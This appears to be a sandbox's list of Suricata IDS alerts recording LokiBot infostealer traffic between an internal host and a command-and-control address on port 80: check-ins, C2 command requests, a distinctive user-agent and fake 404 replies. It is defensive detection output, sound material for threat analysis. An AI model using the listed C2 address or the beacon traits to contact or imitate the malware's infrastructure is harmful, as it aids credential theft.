Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50043 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50041
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49947 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50027 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50047 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50027
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50040
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49947
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50036 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50047
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50045 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50030
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50036
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49998 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50046 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50063 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50005 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50055 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50063
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50028 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50044 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50051
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50029 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49998
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49953 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50058 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50045
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49953
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50028
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50064 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50050 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50032 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50050
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50032
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50005
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50044
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49992 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50046
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49714 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50043
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50031 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50029
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50015 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50064
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49976 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49992
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50015
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50071 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50061 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50031
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50061
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50058
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50070 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50073 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49976
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50037 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50070
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50039 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50052 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50073
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50054 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50071
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50033 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:49714
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50039
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50066 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49970 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50053 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50042 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50053
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50052
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50059 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50059 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50059 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50065 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50067 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50059 -> 94.156.177.220:80
Source: Network traffic Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.5:50065
